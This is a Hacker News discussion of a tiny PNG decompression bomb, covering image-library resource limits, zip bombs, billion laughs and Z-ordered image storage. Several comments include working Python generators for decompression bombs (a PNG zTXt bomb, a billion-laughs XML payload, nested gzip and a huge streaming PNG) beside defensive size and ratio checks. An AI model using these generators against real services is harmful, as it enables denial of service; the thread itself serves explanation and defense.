
Biggest image in the smallest space - fekberg
https://www.bamsoftware.com/hacks/deflate.html
======
michaelmior
Actually, it decompresses to a 5.8MB PNG. However, many graphics programs may
choose to use three bytes per pixel when rendering the image, and because it
has incredibly large dimensions, this representation would take up 141GB of
RAM.
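
For reference, the arithmetic behind that figure, using the 225,000 x 225,000
pixel dimensions the article gives:

    >>> 225_000 * 225_000 * 3   # bytes for a 3-byte-per-pixel raster
    151875000000
    >>> round(_ / 2**30, 1)     # in GiB
    141.4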

~~~
jerf
One of the rules of secure programming is that any program used in an even
remotely security-sensitive context, and anything displaying a Portable
_Network_ Graphic is likely to be used in such a context, must allow its
callers to specify resource usage limits. In this case that could be a cap on
dimensions or on the total RAM allowed to be used. Limits need not be hard,
either; they could instead produce a prompt, the way very long-running scripts
in the browser ask you whether they should continue.

Now, go find an API/library for dealing with PNGs that allows you to pass in
such a limit, let alone pass in a callback for dealing with violations. Go
ahead. I'll wait.

(The Internet being what it is, if there is one, someone will pop up in a
reply in five minutes citing it. If so, my compliments to the authors! But I
think we can all agree that in general image APIs do not offer this control.
In fact, if you submitted a patch to add it, it would probably be rejected by
most projects as unnecessarily complicating the API.)

This is the sort of thing I mean when I say that we are so utterly buried by
insecure coding practices that we can hardly even perceive it around us. I
should add this as another example in
[http://www.jerf.org/iri/post/2942](http://www.jerf.org/iri/post/2942).
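
(One counterexample from the Python world: Pillow exposes a global pixel-count
ceiling and dedicated decompression-bomb warning/error classes. A minimal
sketch, with a hypothetical input file name:)

    # Pillow's bomb guard: Image.open() compares the declared pixel count
    # against Image.MAX_IMAGE_PIXELS before decoding the raster.
    import warnings
    from PIL import Image

    Image.MAX_IMAGE_PIXELS = 10_000_000                  # cap at 10 megapixels
    warnings.simplefilter("error", Image.DecompressionBombWarning)

    try:
        # Past twice the limit, recent Pillow raises DecompressionBombError
        # outright, hence catching both.
        with Image.open("suspect.png") as img:           # hypothetical file
            img.load()
    except (Image.DecompressionBombWarning, Image.DecompressionBombError) as exc:
        print("refused:", exc)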

~~~
userbinator
_Now, go find an API/library for dealing with PNGs that allows you to pass in
such a limit_

The article itself links to
[http://libpng.sourceforge.net/decompression_bombs.html](http://libpng.sourceforge.net/decompression_bombs.html)

 _These new libpng versions do not impose any arbitrary limits on the memory
consumption and number of ancillary chunks, but they do allow applications to
do so via the png_set_chunk_malloc_max() and png_set_chunk_cache_max()
functions, respectively._

~~~
jerf
Now, go check your bindings, too. Often binding authors consider these
incidental and unimportant and don't expose them.

------
DanBC
That's impressive. Here are some other compression curiosities.

[http://www.maximumcompression.com/compression_fun.php](http://www.maximumcompression.com/compression_fun.php)

A 24-byte file that uncompresses to 5MB; another file with good compression
under RAR but almost no compression under ZIP; and a compressed file that
decompresses to itself.

~~~
Filligree
I'll add mine: [https://brage.info/hello](https://brage.info/hello)

It's a 1MB file that decompresses to 261 tredecillion bytes of "Hello, World".

No terribly clever stream manipulation; it's a perfectly normal gzip file,
other than the size. The generation script is here:
[http://sprunge.us/VhFc](http://sprunge.us/VhFc), but see if you can figure it
out without peeking.

~~~
kuschku
Actually, it decompresses into a 1.4MiB file, which decompresses into another
1.4MiB file, recursively.

~~~
Filligree
I sized it to fit on a floppy disk. :-3

But, no. There's a finite number of levels, and it blows up pretty quickly.
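
(A toy-scale sketch of one way to get that behavior - not necessarily how the
linked script does it: each layer gzips many repeated copies of the previous
layer, and repetition is exactly what DEFLATE compresses best, so the file
stays small while the fully recursive decompressed size grows geometrically.)

    # Nested gzip layers: each level stores 1024 copies of the previous
    # level, which compress extremely well because they are pure repetition.
    import gzip

    payload = b"Hello, World!\n"
    for level in range(1, 6):
        payload = gzip.compress(payload * 1024, 9)
        print(f"level {level}: {len(payload)} bytes on disk")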

------
0x0
That's neat, but I still think the self-reproducing r.zip from "zip files all
the way down" is the best compression trick I've seen:

[http://research.swtch.com/zip](http://research.swtch.com/zip)

~~~
dmit
There's also dynamic generation of output by specifying a custom filter in a
RAR archive that is executed during decompression:
[http://blog.cmpxchg8b.com/2012/09/fun-with-constrained-programming.html](http://blog.cmpxchg8b.com/2012/09/fun-with-constrained-programming.html)

------
__mp
Photoshop was able to show it:
[http://i.imgur.com/7EdBySv.png](http://i.imgur.com/7EdBySv.png) (MacBook Pro,
16GB RAM)

~~~
userbinator
Photoshop is an example of a graphics program that doesn't attempt to read the
entire image into memory.

How much RAM did it actually use?

~~~
__mp
Difficult to say. I don't completely understand Activity Monitor's RAM
column: [http://i.imgur.com/QS3NPQQ.png](http://i.imgur.com/QS3NPQQ.png)
Looking at the Activity Monitor details, we see that it uses something on the
order of 2.54GB of real memory. I suspect the rest is mostly compressed memory.

------
semi-extrinsic
If you follow the "related reading" link at the bottom of TFA, you come to a
page by Glenn Randers-Pehrson discussing how libpng deals with decompression
bombs. At the bottom of that page you find the following curious note; anyone
know what to make of it?

""" [Note for any DHS people who have stumbled upon this site, be aware that
this is a cybersecurity issue, not a physical security issue. Feel free to
contact me at <glennrp at users.sourceforge.net> to discuss it.] """

~~~
saalweachter
He's presumably had problems with people confusing "decompression bombs" with
the blowy-up kind and sending him panicky e-mails.

~~~
cperciva
Another possibly apocryphal case of linguistic collisions resulting in
governmental interest: When the MIT Media Lab started doing work on
intelligent kitchen counters, they found that a lot of shadowy government
agencies wanted to talk to them about their research into "counter
intelligence".

------
wiredfool
PNGs also have optional compressed text metadata chunks, and it's possible to
sneak a decompression bomb into one of those as well. You can get about a
factor of 1000 in the compression -- 1MB of 'a' winds up being about 1040
bytes. You can have multiple iTXt chunks, and it appears that the chunk size
is limited only by the format's maximum of 2^31-1 bytes.

See [https://github.com/python-pillow/Pillow/blob/master/Tests/check_png_dos.py](https://github.com/python-pillow/Pillow/blob/master/Tests/check_png_dos.py)
for a quick way to generate some of these.
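
(A minimal sketch of the idea - using the simpler zTXt chunk rather than iTXt,
with hypothetical file names: a PNG chunk is a 4-byte big-endian length, a
4-byte type, the data, and a CRC32 over type+data, so you can splice a
compressed-text bomb in just before IEND.)

    # Splice a zTXt decompression bomb into an existing PNG.
    import struct, zlib

    def png_chunk(ctype: bytes, data: bytes) -> bytes:
        return (struct.pack(">I", len(data)) + ctype + data
                + struct.pack(">I", zlib.crc32(ctype + data)))

    text = b"a" * 1_000_000                              # 1MB of 'a'
    ztxt = b"Comment\x00\x00" + zlib.compress(text, 9)   # keyword, NUL, method 0, zlib stream
    print(len(ztxt))                                     # roughly 1KB: the factor-1000 above

    original = open("plain.png", "rb").read()
    iend = original.rindex(b"IEND") - 4                  # back up over the length field
    with open("bomb.png", "wb") as f:
        f.write(original[:iend] + png_chunk(b"zTXt", ztxt) + original[iend:])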

------
andersthue
Reminds me of how you could crash a FidoNet node by sending it some big empty
files, so that when they were automatically unzipped they filled up the hard
drive :)

~~~
fizgig
I think this kind of thing was common even a few years ago for DoS'ing mail
gateways that uncompressed and scanned various archive formats: things like
files that are really huge when uncompressed, or ridiculously deep nested
directory structures.

I think most software these days is immune to such tricks, or at least has
tunables to reduce the chance of such tricks causing harm.

~~~
digi_owl
Zip bombs, a relative of the fork bomb.

[https://en.wikipedia.org/wiki/Zip_bomb](https://en.wikipedia.org/wiki/Zip_bomb)

The billion laughs XML attack is also lovely in its simplicity.

[https://en.wikipedia.org/wiki/Billion_laughs](https://en.wikipedia.org/wiki/Billion_laughs)
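
(For the curious, the payload is tiny and easy to generate - ten levels of
entities, each expanding to ten copies of the one below, so roughly a kilobyte
of XML balloons to 10^9 "lol"s, about 3GB, when a naive parser expands the
entities:)

    # Generate the classic billion-laughs XML payload.
    levels = 10
    entities = ['<!ENTITY lol0 "lol">']
    for i in range(1, levels):
        refs = f"&lol{i - 1};" * 10              # ten references to the level below
        entities.append(f'<!ENTITY lol{i} "{refs}">')
    payload = ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n  '
               + "\n  ".join(entities)
               + f'\n]>\n<lolz>&lol{levels - 1};</lolz>')
    print(len(payload), "bytes on disk")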

~~~
Koahku
I was doing a presentation about various bombs last year and crashed
PowerPoint by copy-pasting a billion-laughs payload into a slide. Simple but
extremely effective.

~~~
digi_owl
Not sure which is worse: that MS has PowerPoint interpreting randomly pasted
XML, or that they have no handling for excessive memory usage beyond crashing
the whole program.

------
eli_gottlieb
[http://jeremykun.com/2012/04/21/kolmogorov-complexity-a-primer/](http://jeremykun.com/2012/04/21/kolmogorov-complexity-a-primer/)

[http://c2.com/cgi/wiki?KolmogorovComplexity](http://c2.com/cgi/wiki?KolmogorovComplexity)

Here be rabbit-hole.

------
inglor
This does wonders when used in favicons :D

~~~
raffomania
I just tried it on a locally served page, and my browser handles it quite well
(although it won't really display it).

~~~
inglor
Only on Firefox and Chrome, since they fixed it:
[https://github.com/benjamingr/favicon-bug](https://github.com/benjamingr/favicon-bug)

------
raffomania
Fun fact: when trying to upload this as a profile picture (on a site I host
myself), Chromium crashes.

------
dahart
Having dealt with and printed a lot of _very_ large images, e.g., 60k x 60k
pixels, I have been on the lookout for image processing software that never
decompresses the entire image into RAM, but instead works on blocks, scan
lines, or blocks of scan lines, staying in constant memory and streaming to
and from disk. For example, the ImageMagick fork GraphicsMagick does a much
better job of this than ImageMagick. What other software is out there that can
handle these kinds of images?

~~~
phkahler
The key is not to store it in raster form in RAM. Either use tiles (like GIMP
does) or, my preference, Z-ordering. Then a user can zoom in and pan around
easily - you let the system swap and it won't be bad at all. If they zoom out,
though, you probably want to store MIP maps of it.

Swap works well for this as long as your data has good locality; huge raster
images don't.

But no, I'm not aware of any software that handles stuff like that well -
except GIMP's tiling, but that's not going to help when zoomed out.

~~~
dahart
What does Z-ordering mean in this context?

I definitely want to avoid swap at all costs and find things that are designed
to tile & stream instead. The difference between GraphicsMagick resizing an
image by streaming and ImageMagick resizing an image that hits swap is orders
of magnitude - seconds versus hours.

~~~
phkahler
>> What does Z-ordering mean in this context?

You divide the image into quarters and store each quarter as a contiguous
block of memory. Do this recursively.

Normally we'd index into the pixel data using pixel[x,y]. You can get
Z-ordering by using pixel[interleave(x,y)], where the function interleave(x,y)
interleaves the bits of the two parameters.

This works fantastically well when the image is a square with power-of-two
dimensions, and degrades badly when it's one pixel high and really wide. Using
square tiles that are each Z-ordered internally is probably a useful
combination.

For my ray tracer I use a single counter to scan all the pixels in an image. I
feed the counter into a "deinterleave" function to split it into an X and Y
coordinate before shooting a ray. That way the image is rendered in Z-order,
which means better cache behavior from ray to ray; just this one change
resulted in a 7-9 percent speedup.
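
(A minimal sketch of those two functions for 16-bit coordinates - this is just
the classic Morton-code bit trick, nothing specific to the renderer described
above:)

    # interleave(x, y) alternates the bits of x and y so that nearby (x, y)
    # pairs map to nearby indices; deinterleave() inverts it.
    def interleave(x: int, y: int) -> int:
        z = 0
        for i in range(16):
            z |= ((x >> i) & 1) << (2 * i)       # bits of x go to even positions
            z |= ((y >> i) & 1) << (2 * i + 1)   # bits of y go to odd positions
        return z

    def deinterleave(z: int) -> tuple[int, int]:
        x = y = 0
        for i in range(16):
            x |= ((z >> (2 * i)) & 1) << i
            y |= ((z >> (2 * i + 1)) & 1) << i
        return x, y

    assert deinterleave(interleave(123, 456)) == (123, 456)
    # Z-order access: pixels[interleave(x, y)] instead of pixels[y * width + x]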

Once you have data coherence, swapping is not a big deal either in
applications where you're zoomed in.

~~~
tripzilch
> You can get Z-ordering by using pixel[interleave(x,y)] where the function
> interleave(x,y) interleaves the bits of the two parameters.

That is pretty cool (also the raytracing application), but most surprising to
me is that I remember the interleave operator from reading the INTERCAL[0]
docs ... I never even considered that the function could actually be applied
to something useful :-)

[0] one of the early esoteric programming languages, designed to be "most
unlike any other language". It also features a "COME FROM" statement (because
GOTO is considered harmful), which IIRC also has a parallel in some modern
programming paradigms.

------
AndrewStephens
I used to work on a scanning SMTP/HTTP proxy, and even back then it wasn't
unknown for people to send crafted decompression bombs in an attempt to crash
the service. We handled it by estimating the total uncompressed size upfront
(including sub-archives) and throwing out anything with a suspiciously large
compression ratio.

I imagine that .pdf files are another avenue for mischief. They contain lots
of chunks which may be compressed in varying ways.
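
(A minimal sketch of that upfront estimate for ZIP archives, with the caveat
that declared sizes can lie, so a real scanner would also enforce limits while
actually extracting:)

    # Sum the declared uncompressed sizes, recursing into nested .zip
    # members, and flag archives whose overall ratio looks suspicious.
    import io, os, zipfile

    MAX_RATIO = 100

    def declared_size(zf: zipfile.ZipFile) -> int:
        total = 0
        for info in zf.infolist():
            total += info.file_size
            if info.filename.lower().endswith(".zip"):
                # NB: reading the nested member is itself a hazard; a real
                # scanner would bound this read too.
                with zf.open(info) as member:
                    total += declared_size(zipfile.ZipFile(io.BytesIO(member.read())))
        return total

    def looks_like_bomb(path: str) -> bool:
        with zipfile.ZipFile(path) as zf:
            return declared_size(zf) > MAX_RATIO * os.path.getsize(path)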

------
tetrep
Neat. I needed to make very large PNG bombs recently and toyed with the idea
of doing it "manually." In the end I decided to take the lazy route and use
libpng[1].

[1]:
[https://bitbucket.org/tetrep/pngbomb/src/03dfc95065d78562c156c056abc3d5f1fd7047b8/pngbomb.c?at=master](https://bitbucket.org/tetrep/pngbomb/src/03dfc95065d78562c156c056abc3d5f1fd7047b8/pngbomb.c?at=master)
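
(For comparison, a rough Python sketch of the same idea without libpng: stream
zero-filled scanlines through zlib so the writer never holds the raster
either. The output name and dimensions are arbitrary.)

    # Write a valid PNG with huge declared dimensions, one scanline at a time.
    import struct, zlib

    def chunk(ctype: bytes, data: bytes) -> bytes:
        return (struct.pack(">I", len(data)) + ctype + data
                + struct.pack(">I", zlib.crc32(ctype + data)))

    width = height = 100_000                                      # 10 gigapixels
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)  # 8-bit grayscale

    comp = zlib.compressobj(9)
    row = b"\x00" * (width + 1)                                   # filter byte + pixels
    idat = bytearray()
    for _ in range(height):
        idat += comp.compress(row)
    idat += comp.flush()

    with open("bomb.png", "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n")
        f.write(chunk(b"IHDR", ihdr) + chunk(b"IDAT", bytes(idat)) + chunk(b"IEND", b""))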

~~~
x0
This works wonderfully! With an image size of 123456x123456, I made this
happen: [http://i.imgur.com/2Dgrazj.png](http://i.imgur.com/2Dgrazj.png)

I killed it at about 25GB of memory usage; who knows how high it would have
climbed otherwise.

------
JosephRedfern
That's cool. Presumably the same "attack" could be applied to any file format
that uses DEFLATE.

From a legal standpoint, I'd be wary about following through on the author's
suggestion to "Upload as your profile picture to some online service, try to
crash their image processing scripts" without permission. Sounds like a good
way of getting into trouble.

~~~
atom_enger
What about responsibly disclosing the bug you found with steps to reproduce,
the impact and the solution? As long as you only timed out the backend without
entirely crashing it, I can't imagine any sane company would prosecute you for
trying to improve their service with this level of detail.

~~~
JosephRedfern
How do you know that you're only going to time out the backend, without
entirely crashing it, unless you actually attempt it? It's kind of a
Schrödinger's cat scenario.

It's all well and good saying that you had good intentions, but if you can't
prove it, and they didn't invite you to test (via a responsible disclosure
policy), then I would steer clear.

While I wouldn't personally attempt to prosecute anyone for responsibly
disclosing a bug to me, that doesn't mean BigCorp™ wouldn't.

------
logicallee
>The image is almost entirely zeroes, with a secret message in the center.

Too pressed for time to check - did anyone look? What is it?

~~~
sgdread
It is "SORRY, OUR PRINCESS IS IN ANOTHER PIXMAP"

------
tiler
I realize that this is beside the point, but going on the title alone, we
could write a script that generates an 'infinite' (maxing out available
memory) sized image.

------
javajosh
Everyone's focusing on this being a PNG problem, but actually, if my server
unzips a 420-byte file into a 5.8MB file of any kind, I'd say that's the first
red flag. Assuming some sort of streaming decompression, you could write an
output filter that shuts off the decompressor once it has emitted a factor of
X more bytes than it consumed. A reasonable factor would be 10 - which in this
case would have halted decompression at about 4kB.

This would probably be a trivial patch to bzip2. But I like the general idea
of passing a "max output-to-input ratio" to any process or function that might
yield far more output than input.
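
(A minimal sketch of that output filter, using Python's incremental bz2
decompressor since bzip2 came up - zlib's decompressobj supports the same
max_length cap:)

    # Stop decompressing the moment output exceeds RATIO times the input.
    import bz2

    RATIO = 10

    def bounded_bunzip(compressed: bytes) -> bytes:
        limit = RATIO * len(compressed)
        d = bz2.BZ2Decompressor()
        out = d.decompress(compressed, max_length=limit)
        if len(out) >= limit and not d.eof:
            raise ValueError(f"output exceeded {RATIO}x input; likely a bomb")
        return out

For the 420-byte file here, RATIO = 10 stops things after about 4.2kB of
output.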

~~~
ctdonath
The real problem is image-handling libraries that blindly render images into
too-large objects where unnecessary. While full-res uncompressed images are
very convenient under the hood, the image library should inherently handle
anything "too big" gracefully. Instead, we're often prone to apps crashing
when someone feeds in a ridiculously large image.

A 420B -> 5.8MB expansion should not be a "red flag", because there is nothing
about it (including the subsequent attempt to process a 141GB uncompressed
image) that cannot be handled appropriately in software. Flagging on such
ratios is arbitrary, and setting an arbitrary limit is usually a sign that the
software is incorrect, not the data.

~~~
javajosh
A ratio limit is a heuristic.

There _is_ an upper-limit to how much _information_ you can compress into a
given space. (Note that we may want to write a pathological program that is
very small and allocates a lot of information-free memory. But that's not
decompression.)

If we accept the premise, then we can look at another approach to solving this
problem, once and for all! I like examining memory allocation because it's so
general. But there may be another way: we can examine the input to estimate
the compression ratio.

The problem here is that image decompression apparently gives strangers the
ability to provide an arbitrary N and say "Please loop N times and/or allocate
N bits". A modern CPU is overwhelmed by an N 12 bits long or longer. This is a
root cause of many problems! You know, I'm going to go out on a limb here and
make a bold assertion: I assert there is a very safe upper bound on the
decompression ratio, and that for any real algorithm _you can indeed examine
the input to determine whether N exceeds your allowable threshold_. 10x might
be a bit low (although I doubt it), so let's be generous and say 100x. (Which
seems crazy. Nothing that I know of, not even text, compresses that well.)
This means that I believe any image format has a trivially calculable N (for
example, width*height in pixels). I would argue that in the general case
(unless you are doing some sort of compsci research) the image file size
should be related to N. That is, if the width and height each take 10 bits to
express, we should expect a file size on the order of 2^20 bits.

------
ctdonath
Looks handy for large image processing tests, thanks.

------
atom_enger
I'm trying to run the program and create my own image, but I have a few
questions: what did you use for secret.png? Any old PNG?

Are you using PIL or Pillow?

------
pvdebbe
Cool, but most web sites wouldn't allow you to upload a 5MB picture as a
profile picture. Or do they, these days?

------
andrewstuart
Is there a way to check for decompression bombs? I'd like my software to be
able to unzip zip files safely.

~~~
ZenoArrow
Monitor zip files as they decompress, and halt the decompression process if
the ratio between the decompressed output and the zip file's size exceeds a
fixed threshold (for example, something like 10:1).
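
(A minimal sketch of that per-member check with Python's zipfile: read in
chunks, compare against the member's declared compressed size, and bail out as
soon as the ratio is blown:)

    # Halt extraction of any member whose output exceeds MAX_RATIO times
    # its compressed size, rather than trusting declared sizes.
    import zipfile

    MAX_RATIO = 10
    CHUNK = 64 * 1024

    def read_member_safely(zf: zipfile.ZipFile, name: str) -> bytes:
        info = zf.getinfo(name)
        limit = MAX_RATIO * max(info.compress_size, 1)
        out = bytearray()
        with zf.open(info) as stream:
            while block := stream.read(CHUNK):
                out += block
                if len(out) > limit:
                    raise ValueError(f"{name}: over {MAX_RATIO}:1, likely a bomb")
        return bytes(out)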

~~~
Ambroos
If you do that, pick something a little more extreme. With BEM, for example,
your CSS becomes pretty repetitive and you easily get better than a 10:1 ratio
with GZIP.

------
ak2196
It's probably using middle-out.

------
TurplePurtle
I wonder what the ratio would look like if the equivalent was done with a JPEG
instead of a PNG.

------
mridulmalpani
Did anybody try to upload it to Facebook as a profile picture?

~~~
MrKristopher
"Your photo couldn't be uploaded due to restrictions on image dimensions.
Photos should be less than 30,000 pixels in any dimension, and less than
41,000,000 pixels in total size."

------
hnpc123
The title was changed and is now more opaque and less descriptive.

~~~
fekberg
Yeah, I agree. The original title was a lot more descriptive.

~~~
dang
The original title is the one the author gave it. The HN guidelines ask you
not to change that unless it is linkbait or misleading.

~~~
fekberg
Ah yes, of course. Thanks, I'll keep that in mind for the future!

------
_hhff
righto pied piper

------
hadeharian
This is a very easy form of attack, well known in security circles.

